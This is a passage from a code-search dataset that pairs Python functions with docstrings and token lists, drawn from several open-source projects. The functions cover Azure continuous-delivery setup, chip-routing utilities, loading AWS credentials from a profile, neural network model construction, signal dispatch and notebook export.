"# Construct the config body of the continuous delivery call",
"build_configuration",
"=",
"self",
".",
"_get_build_configuration",
"(",
"app_type_details",
")",
"source",
"=",
"ProvisioningConfigurationSource",
"(",
"'codeRepository'",
",",
"source_repository",
",",
"build_configuration",
")",
"auth_info",
"=",
"AuthorizationInfo",
"(",
"'Headers'",
",",
"AuthorizationInfoParameters",
"(",
"'Bearer '",
"+",
"vsts_app_auth_token",
")",
")",
"target",
"=",
"self",
".",
"get_provisioning_configuration_target",
"(",
"auth_info",
",",
"swap_with_slot",
",",
"test",
",",
"webapp_list",
")",
"ci_config",
"=",
"CiConfiguration",
"(",
"CiArtifact",
"(",
"name",
"=",
"cd_project_name",
")",
")",
"config",
"=",
"ProvisioningConfiguration",
"(",
"None",
",",
"source",
",",
"target",
",",
"ci_config",
")",
"# Configure the continuous deliver using VSTS as a backend",
"response",
"=",
"cd",
".",
"provisioning_configuration",
"(",
"config",
")",
"if",
"response",
".",
"ci_configuration",
".",
"result",
".",
"status",
"==",
"'queued'",
":",
"final_status",
"=",
"self",
".",
"_wait_for_cd_completion",
"(",
"cd",
",",
"response",
")",
"return",
"self",
".",
"_get_summary",
"(",
"final_status",
",",
"account_url",
",",
"vsts_account_name",
",",
"account_created",
",",
"self",
".",
"_azure_info",
".",
"subscription_id",
",",
"self",
".",
"_azure_info",
".",
"resource_group_name",
",",
"self",
".",
"_azure_info",
".",
"website_name",
")",
"else",
":",
"raise",
"RuntimeError",
"(",
"'Unknown status returned from provisioning_configuration: '",
"+",
"response",
".",
"ci_configuration",
".",
"result",
".",
"status",
")"
] | Use this method to setup Continuous Delivery of an Azure web site from a source control repository.
:param swap_with_slot: the slot to use for deployment
:param app_type_details: the details of app that will be deployed. i.e. app_type = Python, python_framework = Django etc.
:param cd_project_url: CD Project url in the format of https://<accountname>.visualstudio.com/<projectname>
:param create_account: Boolean value to decide if account need to be created or not
:param vsts_app_auth_token: Authentication token for vsts app
:param test: Load test webapp name
:param webapp_list: Existing webapp list
:return: a message indicating final status and instructions for the user | [
"Use",
"this",
"method",
"to",
"setup",
"Continuous",
"Delivery",
"of",
"an",
"Azure",
"web",
"site",
"from",
"a",
"source",
"control",
"repository",
".",
":",
"param",
"swap_with_slot",
":",
"the",
"slot",
"to",
"use",
"for",
"deployment",
":",
"param",
"app_type_details",
":",
"the",
"details",
"of",
"app",
"that",
"will",
"be",
"deployed",
".",
"i",
".",
"e",
".",
"app_type",
"=",
"Python",
"python_framework",
"=",
"Django",
"etc",
".",
":",
"param",
"cd_project_url",
":",
"CD",
"Project",
"url",
"in",
"the",
"format",
"of",
"https",
":",
"//",
"<accountname",
">",
".",
"visualstudio",
".",
"com",
"/",
"<projectname",
">",
":",
"param",
"create_account",
":",
"Boolean",
"value",
"to",
"decide",
"if",
"account",
"need",
"to",
"be",
"created",
"or",
"not",
":",
"param",
"vsts_app_auth_token",
":",
"Authentication",
"token",
"for",
"vsts",
"app",
":",
"param",
"test",
":",
"Load",
"test",
"webapp",
"name",
":",
"param",
"webapp_list",
":",
"Existing",
"webapp",
"list",
":",
"return",
":",
"a",
"message",
"indicating",
"final",
"status",
"and",
"instructions",
"for",
"the",
"user"
] | train | https://github.com/Microsoft/vsts-cd-manager/blob/2649d236be94d119b13e0ac607964c94a9e51fde/vsts_cd_manager/continuous_delivery_manager.py#L87-L139 |
project-rig/rig | rig/place_and_route/route/utils.py | longest_dimension_first | def longest_dimension_first(vector, start=(0, 0), width=None, height=None):
"""List the (x, y) steps on a longest-dimension first route.
Note that when multiple dimensions are the same magnitude, one will be
chosen at random with uniform probability.
Parameters
----------
vector : (x, y, z)
The vector which the path should cover.
start : (x, y)
The coordinates from which the path should start (note this is a 2D
coordinate).
width : int or None
The width of the topology beyond which we wrap around (0 <= x < width).
If None, no wrapping on the X axis will occur.
height : int or None
The height of the topology beyond which we wrap around (0 <= y <
height). If None, no wrapping on the Y axis will occur.
Returns
-------
[(:py:class:`~rig.links.Links`, (x, y)), ...]
Produces (in order) a (direction, (x, y)) pair for every hop along the
longest dimension first route. The direction gives the direction to
travel in from the previous step to reach the current step. Ties are
broken randomly. The first generated value is that of the first hop
after the starting position, the last generated value is the
destination position.
"""
x, y = start
out = []
for dimension, magnitude in sorted(enumerate(vector),
key=(lambda x:
abs(x[1]) + random.random()),
reverse=True):
if magnitude == 0:
break
# Advance in the specified direction
sign = 1 if magnitude > 0 else -1
for _ in range(abs(magnitude)):
if dimension == 0:
dx, dy = sign, 0
elif dimension == 1:
dx, dy = 0, sign
elif dimension == 2: # pragma: no branch
dx, dy = -sign, -sign
x += dx
y += dy
# Wrap-around if required
if width is not None:
x %= width
if height is not None:
y %= height
direction = Links.from_vector((dx, dy))
out.append((direction, (x, y)))
return out | python | def longest_dimension_first(vector, start=(0, 0), width=None, height=None):
"""List the (x, y) steps on a longest-dimension first route.
Note that when multiple dimensions are the same magnitude, one will be
chosen at random with uniform probability.
Parameters
----------
vector : (x, y, z)
The vector which the path should cover.
start : (x, y)
The coordinates from which the path should start (note this is a 2D
coordinate).
width : int or None
The width of the topology beyond which we wrap around (0 <= x < width).
If None, no wrapping on the X axis will occur.
height : int or None
The height of the topology beyond which we wrap around (0 <= y <
height). If None, no wrapping on the Y axis will occur.
Returns
-------
[(:py:class:`~rig.links.Links`, (x, y)), ...]
Produces (in order) a (direction, (x, y)) pair for every hop along the
longest dimension first route. The direction gives the direction to
travel in from the previous step to reach the current step. Ties are
broken randomly. The first generated value is that of the first hop
after the starting position, the last generated value is the
destination position.
"""
x, y = start
out = []
for dimension, magnitude in sorted(enumerate(vector),
key=(lambda x:
abs(x[1]) + random.random()),
reverse=True):
if magnitude == 0:
break
# Advance in the specified direction
sign = 1 if magnitude > 0 else -1
for _ in range(abs(magnitude)):
if dimension == 0:
dx, dy = sign, 0
elif dimension == 1:
dx, dy = 0, sign
elif dimension == 2: # pragma: no branch
dx, dy = -sign, -sign
x += dx
y += dy
# Wrap-around if required
if width is not None:
x %= width
if height is not None:
y %= height
direction = Links.from_vector((dx, dy))
out.append((direction, (x, y)))
return out | [
"def",
"longest_dimension_first",
"(",
"vector",
",",
"start",
"=",
"(",
"0",
",",
"0",
")",
",",
"width",
"=",
"None",
",",
"height",
"=",
"None",
")",
":",
"x",
",",
"y",
"=",
"start",
"out",
"=",
"[",
"]",
"for",
"dimension",
",",
"magnitude",
"in",
"sorted",
"(",
"enumerate",
"(",
"vector",
")",
",",
"key",
"=",
"(",
"lambda",
"x",
":",
"abs",
"(",
"x",
"[",
"1",
"]",
")",
"+",
"random",
".",
"random",
"(",
")",
")",
",",
"reverse",
"=",
"True",
")",
":",
"if",
"magnitude",
"==",
"0",
":",
"break",
"# Advance in the specified direction",
"sign",
"=",
"1",
"if",
"magnitude",
">",
"0",
"else",
"-",
"1",
"for",
"_",
"in",
"range",
"(",
"abs",
"(",
"magnitude",
")",
")",
":",
"if",
"dimension",
"==",
"0",
":",
"dx",
",",
"dy",
"=",
"sign",
",",
"0",
"elif",
"dimension",
"==",
"1",
":",
"dx",
",",
"dy",
"=",
"0",
",",
"sign",
"elif",
"dimension",
"==",
"2",
":",
"# pragma: no branch",
"dx",
",",
"dy",
"=",
"-",
"sign",
",",
"-",
"sign",
"x",
"+=",
"dx",
"y",
"+=",
"dy",
"# Wrap-around if required",
"if",
"width",
"is",
"not",
"None",
":",
"x",
"%=",
"width",
"if",
"height",
"is",
"not",
"None",
":",
"y",
"%=",
"height",
"direction",
"=",
"Links",
".",
"from_vector",
"(",
"(",
"dx",
",",
"dy",
")",
")",
"out",
".",
"append",
"(",
"(",
"direction",
",",
"(",
"x",
",",
"y",
")",
")",
")",
"return",
"out"
] | List the (x, y) steps on a longest-dimension first route.
Note that when multiple dimensions are the same magnitude, one will be
chosen at random with uniform probability.
Parameters
----------
vector : (x, y, z)
The vector which the path should cover.
start : (x, y)
The coordinates from which the path should start (note this is a 2D
coordinate).
width : int or None
The width of the topology beyond which we wrap around (0 <= x < width).
If None, no wrapping on the X axis will occur.
height : int or None
The height of the topology beyond which we wrap around (0 <= y <
height). If None, no wrapping on the Y axis will occur.
Returns
-------
[(:py:class:`~rig.links.Links`, (x, y)), ...]
Produces (in order) a (direction, (x, y)) pair for every hop along the
longest dimension first route. The direction gives the direction to
travel in from the previous step to reach the current step. Ties are
broken randomly. The first generated value is that of the first hop
after the starting position, the last generated value is the
destination position. | [
"List",
"the",
"(",
"x",
"y",
")",
"steps",
"on",
"a",
"longest",
"-",
"dimension",
"first",
"route",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/route/utils.py#L9-L73 |
project-rig/rig | rig/place_and_route/route/utils.py | links_between | def links_between(a, b, machine):
"""Get the set of working links connecting chips a and b.
Parameters
----------
a : (x, y)
b : (x, y)
machine : :py:class:`~rig.place_and_route.Machine`
Returns
-------
set([:py:class:`~rig.links.Links`, ...])
"""
ax, ay = a
bx, by = b
return set(link for link, (dx, dy) in ((l, l.to_vector()) for l in Links)
if (ax + dx) % machine.width == bx and
(ay + dy) % machine.height == by and
(ax, ay, link) in machine) | python | def links_between(a, b, machine):
"""Get the set of working links connecting chips a and b.
Parameters
----------
a : (x, y)
b : (x, y)
machine : :py:class:`~rig.place_and_route.Machine`
Returns
-------
set([:py:class:`~rig.links.Links`, ...])
"""
ax, ay = a
bx, by = b
return set(link for link, (dx, dy) in ((l, l.to_vector()) for l in Links)
if (ax + dx) % machine.width == bx and
(ay + dy) % machine.height == by and
(ax, ay, link) in machine) | [
"def",
"links_between",
"(",
"a",
",",
"b",
",",
"machine",
")",
":",
"ax",
",",
"ay",
"=",
"a",
"bx",
",",
"by",
"=",
"b",
"return",
"set",
"(",
"link",
"for",
"link",
",",
"(",
"dx",
",",
"dy",
")",
"in",
"(",
"(",
"l",
",",
"l",
".",
"to_vector",
"(",
")",
")",
"for",
"l",
"in",
"Links",
")",
"if",
"(",
"ax",
"+",
"dx",
")",
"%",
"machine",
".",
"width",
"==",
"bx",
"and",
"(",
"ay",
"+",
"dy",
")",
"%",
"machine",
".",
"height",
"==",
"by",
"and",
"(",
"ax",
",",
"ay",
",",
"link",
")",
"in",
"machine",
")"
] | Get the set of working links connecting chips a and b.
Parameters
----------
a : (x, y)
b : (x, y)
machine : :py:class:`~rig.place_and_route.Machine`
Returns
-------
set([:py:class:`~rig.links.Links`, ...]) | [
"Get",
"the",
"set",
"of",
"working",
"links",
"connecting",
"chips",
"a",
"and",
"b",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/route/utils.py#L76-L94 |
Metatab/metapack | metapack/package/s3.py | set_s3_profile | def set_s3_profile(profile_name):
"""Load the credentials for an s3 profile into environmental variables"""
import os
session = boto3.Session(profile_name=profile_name)
os.environ['AWS_ACCESS_KEY_ID'] = session.get_credentials().access_key
os.environ['AWS_SECRET_ACCESS_KEY'] = session.get_credentials().secret_key | python | def set_s3_profile(profile_name):
"""Load the credentials for an s3 profile into environmental variables"""
import os
session = boto3.Session(profile_name=profile_name)
os.environ['AWS_ACCESS_KEY_ID'] = session.get_credentials().access_key
os.environ['AWS_SECRET_ACCESS_KEY'] = session.get_credentials().secret_key | [
"def",
"set_s3_profile",
"(",
"profile_name",
")",
":",
"import",
"os",
"session",
"=",
"boto3",
".",
"Session",
"(",
"profile_name",
"=",
"profile_name",
")",
"os",
".",
"environ",
"[",
"'AWS_ACCESS_KEY_ID'",
"]",
"=",
"session",
".",
"get_credentials",
"(",
")",
".",
"access_key",
"os",
".",
"environ",
"[",
"'AWS_SECRET_ACCESS_KEY'",
"]",
"=",
"session",
".",
"get_credentials",
"(",
")",
".",
"secret_key"
] | Load the credentials for an s3 profile into environmental variables | [
"Load",
"the",
"credentials",
"for",
"an",
"s3",
"profile",
"into",
"environmental",
"variables"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/package/s3.py#L158-L165 |
NeuroML/NeuroMLlite | neuromllite/utils.py | create_new_model | def create_new_model(reference,
duration,
dt=0.025, # ms
temperature=6.3, # degC
default_region=None,
parameters = None,
cell_for_default_population=None,
color_for_default_population='0.8 0 0',
input_for_default_population=None,
synapses=[],
simulation_seed=12345,
network_filename=None,
simulation_filename=None):
################################################################################
### Build a new network
net = Network(id=reference)
net.notes = "A network model: %s"%reference
net.temperature = temperature # degC
if parameters:
net.parameters = parameters
################################################################################
### Add some regions
if default_region:
if type(default_region)==str:
r1 = RectangularRegion(id=default_region, x=0,y=0,z=0,width=1000,height=100,depth=1000)
net.regions.append(r1)
default_region = r1
else:
net.regions.append(default_region)
################################################################################
### Add some cells
if cell_for_default_population:
net.cells.append(cell_for_default_population)
################################################################################
### Add some synapses
for s in synapses:
net.synapses.append(s)
################################################################################
### Add some populations
if cell_for_default_population:
pop = Population(id='pop_%s'%cell_for_default_population.id,
size=1,
component=cell_for_default_population.id,
properties={'color':color_for_default_population})
if default_region:
pop.region = default_region
pop.random_layout = RandomLayout(region=default_region.id)
net.populations.append(pop)
################################################################################
### Add a projection
'''
net.projections.append(Projection(id='proj0',
presynaptic=p0.id,
postsynaptic=p1.id,
synapse='ampa'))
net.projections[0].random_connectivity=RandomConnectivity(probability=0.5)'''
################################################################################
### Add some inputs
if input_for_default_population:
net.input_sources.append(input_for_default_population)
net.inputs.append(Input(id='Stim_%s'%input_for_default_population.id,
input_source=input_for_default_population.id,
population=pop.id,
percentage=100))
################################################################################
### Save to JSON format
net.id = reference
print(net.to_json())
if network_filename==None:
network_filename='%s.json'%net.id
new_file = net.to_json_file(network_filename)
################################################################################
### Build Simulation object & save as JSON
sim = Simulation(id='Sim_%s'%reference,
network=new_file,
duration=duration,
dt=dt,
seed=simulation_seed,
recordTraces={'all':'*'})
if simulation_filename==None:
simulation_filename='%s.json'%sim.id
sim.to_json_file(simulation_filename)
return sim, net | python | def create_new_model(reference,
duration,
dt=0.025, # ms
temperature=6.3, # degC
default_region=None,
parameters = None,
cell_for_default_population=None,
color_for_default_population='0.8 0 0',
input_for_default_population=None,
synapses=[],
simulation_seed=12345,
network_filename=None,
simulation_filename=None):
################################################################################
### Build a new network
net = Network(id=reference)
net.notes = "A network model: %s"%reference
net.temperature = temperature # degC
if parameters:
net.parameters = parameters
################################################################################
### Add some regions
if default_region:
if type(default_region)==str:
r1 = RectangularRegion(id=default_region, x=0,y=0,z=0,width=1000,height=100,depth=1000)
net.regions.append(r1)
default_region = r1
else:
net.regions.append(default_region)
################################################################################
### Add some cells
if cell_for_default_population:
net.cells.append(cell_for_default_population)
################################################################################
### Add some synapses
for s in synapses:
net.synapses.append(s)
################################################################################
### Add some populations
if cell_for_default_population:
pop = Population(id='pop_%s'%cell_for_default_population.id,
size=1,
component=cell_for_default_population.id,
properties={'color':color_for_default_population})
if default_region:
pop.region = default_region
pop.random_layout = RandomLayout(region=default_region.id)
net.populations.append(pop)
################################################################################
### Add a projection
'''
net.projections.append(Projection(id='proj0',
presynaptic=p0.id,
postsynaptic=p1.id,
synapse='ampa'))
net.projections[0].random_connectivity=RandomConnectivity(probability=0.5)'''
################################################################################
### Add some inputs
if input_for_default_population:
net.input_sources.append(input_for_default_population)
net.inputs.append(Input(id='Stim_%s'%input_for_default_population.id,
input_source=input_for_default_population.id,
population=pop.id,
percentage=100))
################################################################################
### Save to JSON format
net.id = reference
print(net.to_json())
if network_filename==None:
network_filename='%s.json'%net.id
new_file = net.to_json_file(network_filename)
################################################################################
### Build Simulation object & save as JSON
sim = Simulation(id='Sim_%s'%reference,
network=new_file,
duration=duration,
dt=dt,
seed=simulation_seed,
recordTraces={'all':'*'})
if simulation_filename==None:
simulation_filename='%s.json'%sim.id
sim.to_json_file(simulation_filename)
return sim, net | [
"def",
"create_new_model",
"(",
"reference",
",",
"duration",
",",
"dt",
"=",
"0.025",
",",
"# ms ",
"temperature",
"=",
"6.3",
",",
"# degC",
"default_region",
"=",
"None",
",",
"parameters",
"=",
"None",
",",
"cell_for_default_population",
"=",
"None",
",",
"color_for_default_population",
"=",
"'0.8 0 0'",
",",
"input_for_default_population",
"=",
"None",
",",
"synapses",
"=",
"[",
"]",
",",
"simulation_seed",
"=",
"12345",
",",
"network_filename",
"=",
"None",
",",
"simulation_filename",
"=",
"None",
")",
":",
"################################################################################",
"### Build a new network",
"net",
"=",
"Network",
"(",
"id",
"=",
"reference",
")",
"net",
".",
"notes",
"=",
"\"A network model: %s\"",
"%",
"reference",
"net",
".",
"temperature",
"=",
"temperature",
"# degC",
"if",
"parameters",
":",
"net",
".",
"parameters",
"=",
"parameters",
"################################################################################",
"### Add some regions",
"if",
"default_region",
":",
"if",
"type",
"(",
"default_region",
")",
"==",
"str",
":",
"r1",
"=",
"RectangularRegion",
"(",
"id",
"=",
"default_region",
",",
"x",
"=",
"0",
",",
"y",
"=",
"0",
",",
"z",
"=",
"0",
",",
"width",
"=",
"1000",
",",
"height",
"=",
"100",
",",
"depth",
"=",
"1000",
")",
"net",
".",
"regions",
".",
"append",
"(",
"r1",
")",
"default_region",
"=",
"r1",
"else",
":",
"net",
".",
"regions",
".",
"append",
"(",
"default_region",
")",
"################################################################################",
"### Add some cells",
"if",
"cell_for_default_population",
":",
"net",
".",
"cells",
".",
"append",
"(",
"cell_for_default_population",
")",
"################################################################################",
"### Add some synapses",
"for",
"s",
"in",
"synapses",
":",
"net",
".",
"synapses",
".",
"append",
"(",
"s",
")",
"################################################################################",
"### Add some populations",
"if",
"cell_for_default_population",
":",
"pop",
"=",
"Population",
"(",
"id",
"=",
"'pop_%s'",
"%",
"cell_for_default_population",
".",
"id",
",",
"size",
"=",
"1",
",",
"component",
"=",
"cell_for_default_population",
".",
"id",
",",
"properties",
"=",
"{",
"'color'",
":",
"color_for_default_population",
"}",
")",
"if",
"default_region",
":",
"pop",
".",
"region",
"=",
"default_region",
"pop",
".",
"random_layout",
"=",
"RandomLayout",
"(",
"region",
"=",
"default_region",
".",
"id",
")",
"net",
".",
"populations",
".",
"append",
"(",
"pop",
")",
"################################################################################",
"### Add a projection",
"################################################################################",
"### Add some inputs",
"if",
"input_for_default_population",
":",
"net",
".",
"input_sources",
".",
"append",
"(",
"input_for_default_population",
")",
"net",
".",
"inputs",
".",
"append",
"(",
"Input",
"(",
"id",
"=",
"'Stim_%s'",
"%",
"input_for_default_population",
".",
"id",
",",
"input_source",
"=",
"input_for_default_population",
".",
"id",
",",
"population",
"=",
"pop",
".",
"id",
",",
"percentage",
"=",
"100",
")",
")",
"################################################################################",
"### Save to JSON format",
"net",
".",
"id",
"=",
"reference",
"print",
"(",
"net",
".",
"to_json",
"(",
")",
")",
"if",
"network_filename",
"==",
"None",
":",
"network_filename",
"=",
"'%s.json'",
"%",
"net",
".",
"id",
"new_file",
"=",
"net",
".",
"to_json_file",
"(",
"network_filename",
")",
"################################################################################",
"### Build Simulation object & save as JSON",
"sim",
"=",
"Simulation",
"(",
"id",
"=",
"'Sim_%s'",
"%",
"reference",
",",
"network",
"=",
"new_file",
",",
"duration",
"=",
"duration",
",",
"dt",
"=",
"dt",
",",
"seed",
"=",
"simulation_seed",
",",
"recordTraces",
"=",
"{",
"'all'",
":",
"'*'",
"}",
")",
"if",
"simulation_filename",
"==",
"None",
":",
"simulation_filename",
"=",
"'%s.json'",
"%",
"sim",
".",
"id",
"sim",
".",
"to_json_file",
"(",
"simulation_filename",
")",
"return",
"sim",
",",
"net"
] | net.projections.append(Projection(id='proj0',
presynaptic=p0.id,
postsynaptic=p1.id,
synapse='ampa'))
net.projections[0].random_connectivity=RandomConnectivity(probability=0.5) | [
"net",
".",
"projections",
".",
"append",
"(",
"Projection",
"(",
"id",
"=",
"proj0",
"presynaptic",
"=",
"p0",
".",
"id",
"postsynaptic",
"=",
"p1",
".",
"id",
"synapse",
"=",
"ampa",
"))"
] | train | https://github.com/NeuroML/NeuroMLlite/blob/f3fa2ff662e40febfa97c045e7f0e6915ad04161/neuromllite/utils.py#L120-L241 |
NicolasLM/spinach | spinach/signals.py | SafeNamedSignal.send | def send(self, *sender, **kwargs):
"""Emit this signal on behalf of `sender`, passing on kwargs.
This is an extension of `Signal.send` that changes one thing:
Exceptions raised in calling the receiver are logged but do not fail
"""
if len(sender) == 0:
sender = None
elif len(sender) > 1:
raise TypeError('send() accepts only one positional argument, '
'%s given' % len(sender))
else:
sender = sender[0]
if not self.receivers:
return []
rv = list()
for receiver in self.receivers_for(sender):
try:
rv.append((receiver, receiver(sender, **kwargs)))
except Exception:
logger.exception('Error while dispatching signal "{}" '
'to receiver'.format(self.name))
return rv | python | def send(self, *sender, **kwargs):
"""Emit this signal on behalf of `sender`, passing on kwargs.
This is an extension of `Signal.send` that changes one thing:
Exceptions raised in calling the receiver are logged but do not fail
"""
if len(sender) == 0:
sender = None
elif len(sender) > 1:
raise TypeError('send() accepts only one positional argument, '
'%s given' % len(sender))
else:
sender = sender[0]
if not self.receivers:
return []
rv = list()
for receiver in self.receivers_for(sender):
try:
rv.append((receiver, receiver(sender, **kwargs)))
except Exception:
logger.exception('Error while dispatching signal "{}" '
'to receiver'.format(self.name))
return rv | [
"def",
"send",
"(",
"self",
",",
"*",
"sender",
",",
"*",
"*",
"kwargs",
")",
":",
"if",
"len",
"(",
"sender",
")",
"==",
"0",
":",
"sender",
"=",
"None",
"elif",
"len",
"(",
"sender",
")",
">",
"1",
":",
"raise",
"TypeError",
"(",
"'send() accepts only one positional argument, '",
"'%s given'",
"%",
"len",
"(",
"sender",
")",
")",
"else",
":",
"sender",
"=",
"sender",
"[",
"0",
"]",
"if",
"not",
"self",
".",
"receivers",
":",
"return",
"[",
"]",
"rv",
"=",
"list",
"(",
")",
"for",
"receiver",
"in",
"self",
".",
"receivers_for",
"(",
"sender",
")",
":",
"try",
":",
"rv",
".",
"append",
"(",
"(",
"receiver",
",",
"receiver",
"(",
"sender",
",",
"*",
"*",
"kwargs",
")",
")",
")",
"except",
"Exception",
":",
"logger",
".",
"exception",
"(",
"'Error while dispatching signal \"{}\" '",
"'to receiver'",
".",
"format",
"(",
"self",
".",
"name",
")",
")",
"return",
"rv"
] | Emit this signal on behalf of `sender`, passing on kwargs.
This is an extension of `Signal.send` that changes one thing:
Exceptions raised in calling the receiver are logged but do not fail | [
"Emit",
"this",
"signal",
"on",
"behalf",
"of",
"sender",
"passing",
"on",
"kwargs",
"."
] | train | https://github.com/NicolasLM/spinach/blob/0122f916643101eab5cdc1f3da662b9446e372aa/spinach/signals.py#L16-L40 |
Metatab/metapack | metapack/jupyter/exporters.py | DocumentationExporter.update_metatab | def update_metatab(self, doc, resources):
"""Add documentation entries for resources"""
if not 'Documentation' in doc:
doc.new_section("Documentation")
ds = doc['Documentation']
if not 'Name' in ds.args:
ds.add_arg('Name', prepend=True)
# This is the main output from the HTML exporter, not a resource.
ds.new_term('Root.Documentation', 'docs/notebook.html', name="notebook.html", title='Jupyter Notebook (HTML)')
for name, data in resources.get('outputs', {}).items():
if name == 'documentation.html':
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Primary Documentation (HTML)')
elif name == 'html_basic_body.html':
pass
elif name.endswith('.html'):
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Documentation (HTML)')
elif name.endswith('.md'):
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Documentation (Markdown)')
elif name.endswith('.pdf'):
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Documentation (PDF)')
elif name.endswith('.png'):
ds.new_term('Root.Image', 'docs/' + name, name=name, title='Image for HTML Documentation')
else:
pass | python | def update_metatab(self, doc, resources):
"""Add documentation entries for resources"""
if not 'Documentation' in doc:
doc.new_section("Documentation")
ds = doc['Documentation']
if not 'Name' in ds.args:
ds.add_arg('Name', prepend=True)
# This is the main output from the HTML exporter, not a resource.
ds.new_term('Root.Documentation', 'docs/notebook.html', name="notebook.html", title='Jupyter Notebook (HTML)')
for name, data in resources.get('outputs', {}).items():
if name == 'documentation.html':
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Primary Documentation (HTML)')
elif name == 'html_basic_body.html':
pass
elif name.endswith('.html'):
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Documentation (HTML)')
elif name.endswith('.md'):
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Documentation (Markdown)')
elif name.endswith('.pdf'):
ds.new_term('Root.Documentation', 'docs/' + name, name=name, title='Documentation (PDF)')
elif name.endswith('.png'):
ds.new_term('Root.Image', 'docs/' + name, name=name, title='Image for HTML Documentation')
else:
pass | [
"def",
"update_metatab",
"(",
"self",
",",
"doc",
",",
"resources",
")",
":",
"if",
"not",
"'Documentation'",
"in",
"doc",
":",
"doc",
".",
"new_section",
"(",
"\"Documentation\"",
")",
"ds",
"=",
"doc",
"[",
"'Documentation'",
"]",
"if",
"not",
"'Name'",
"in",
"ds",
".",
"args",
":",
"ds",
".",
"add_arg",
"(",
"'Name'",
",",
"prepend",
"=",
"True",
")",
"# This is the main output from the HTML exporter, not a resource.",
"ds",
".",
"new_term",
"(",
"'Root.Documentation'",
",",
"'docs/notebook.html'",
",",
"name",
"=",
"\"notebook.html\"",
",",
"title",
"=",
"'Jupyter Notebook (HTML)'",
")",
"for",
"name",
",",
"data",
"in",
"resources",
".",
"get",
"(",
"'outputs'",
",",
"{",
"}",
")",
".",
"items",
"(",
")",
":",
"if",
"name",
"==",
"'documentation.html'",
":",
"ds",
".",
"new_term",
"(",
"'Root.Documentation'",
",",
"'docs/'",
"+",
"name",
",",
"name",
"=",
"name",
",",
"title",
"=",
"'Primary Documentation (HTML)'",
")",
"elif",
"name",
"==",
"'html_basic_body.html'",
":",
"pass",
"elif",
"name",
".",
"endswith",
"(",
"'.html'",
")",
":",
"ds",
".",
"new_term",
"(",
"'Root.Documentation'",
",",
"'docs/'",
"+",
"name",
",",
"name",
"=",
"name",
",",
"title",
"=",
"'Documentation (HTML)'",
")",
"elif",
"name",
".",
"endswith",
"(",
"'.md'",
")",
":",
"ds",
".",
"new_term",
"(",
"'Root.Documentation'",
",",
"'docs/'",
"+",
"name",
",",
"name",
"=",
"name",
",",
"title",
"=",
"'Documentation (Markdown)'",
")",
"elif",
"name",
".",
"endswith",
"(",
"'.pdf'",
")",
":",
"ds",
".",
"new_term",
"(",
"'Root.Documentation'",
",",
"'docs/'",
"+",
"name",
",",
"name",
"=",
"name",
",",
"title",
"=",
"'Documentation (PDF)'",
")",
"elif",
"name",
".",
"endswith",
"(",
"'.png'",
")",
":",
"ds",
".",
"new_term",
"(",
"'Root.Image'",
",",
"'docs/'",
"+",
"name",
",",
"name",
"=",
"name",
",",
"title",
"=",
"'Image for HTML Documentation'",
")",
"else",
":",
"pass"
] | Add documentation entries for resources | [
"Add",
"documentation",
"entries",
"for",
"resources"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/jupyter/exporters.py#L187-L218 |
Metatab/metapack | metapack/jupyter/exporters.py | NotebookExecutor.get_package_dir_name | def get_package_dir_name(self, nb):
"""This is the name of the package we will be creating. """
package_dir = self.package_dir
if not package_dir:
package_dir = getcwd()
package_name = self.package_name
if not package_name:
doc = ExtractInlineMetatabDoc(package_url="metapack+file:" + package_dir).run(nb)
if not doc:
raise NotebookError("Notebook does not have an inline metatab doc")
t = doc.find_first('Root.Name', section='Root')
if not t:
raise NotebookError("Inline Metatab doc doesnt have a Root.Name term")
package_name = doc.as_version(None)
return package_dir, package_name | python | def get_package_dir_name(self, nb):
"""This is the name of the package we will be creating. """
package_dir = self.package_dir
if not package_dir:
package_dir = getcwd()
package_name = self.package_name
if not package_name:
doc = ExtractInlineMetatabDoc(package_url="metapack+file:" + package_dir).run(nb)
if not doc:
raise NotebookError("Notebook does not have an inline metatab doc")
t = doc.find_first('Root.Name', section='Root')
if not t:
raise NotebookError("Inline Metatab doc doesnt have a Root.Name term")
package_name = doc.as_version(None)
return package_dir, package_name | [
"def",
"get_package_dir_name",
"(",
"self",
",",
"nb",
")",
":",
"package_dir",
"=",
"self",
".",
"package_dir",
"if",
"not",
"package_dir",
":",
"package_dir",
"=",
"getcwd",
"(",
")",
"package_name",
"=",
"self",
".",
"package_name",
"if",
"not",
"package_name",
":",
"doc",
"=",
"ExtractInlineMetatabDoc",
"(",
"package_url",
"=",
"\"metapack+file:\"",
"+",
"package_dir",
")",
".",
"run",
"(",
"nb",
")",
"if",
"not",
"doc",
":",
"raise",
"NotebookError",
"(",
"\"Notebook does not have an inline metatab doc\"",
")",
"t",
"=",
"doc",
".",
"find_first",
"(",
"'Root.Name'",
",",
"section",
"=",
"'Root'",
")",
"if",
"not",
"t",
":",
"raise",
"NotebookError",
"(",
"\"Inline Metatab doc doesnt have a Root.Name term\"",
")",
"package_name",
"=",
"doc",
".",
"as_version",
"(",
"None",
")",
"return",
"package_dir",
",",
"package_name"
] | This is the name of the package we will be creating. | [
"This",
"is",
"the",
"name",
"of",
"the",
"package",
"we",
"will",
"be",
"creating",
"."
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/jupyter/exporters.py#L248-L271 |
Metatab/metapack | metapack/jupyter/exporters.py | NotebookExecutor.get_output_dir | def get_output_dir(self, nb):
"""Open a notebook and determine the output directory from the name"""
self.package_dir, self.package_name = self.get_package_dir_name(nb)
return join(self.package_dir, self.package_name) | python | def get_output_dir(self, nb):
"""Open a notebook and determine the output directory from the name"""
self.package_dir, self.package_name = self.get_package_dir_name(nb)
return join(self.package_dir, self.package_name) | [
"def",
"get_output_dir",
"(",
"self",
",",
"nb",
")",
":",
"self",
".",
"package_dir",
",",
"self",
".",
"package_name",
"=",
"self",
".",
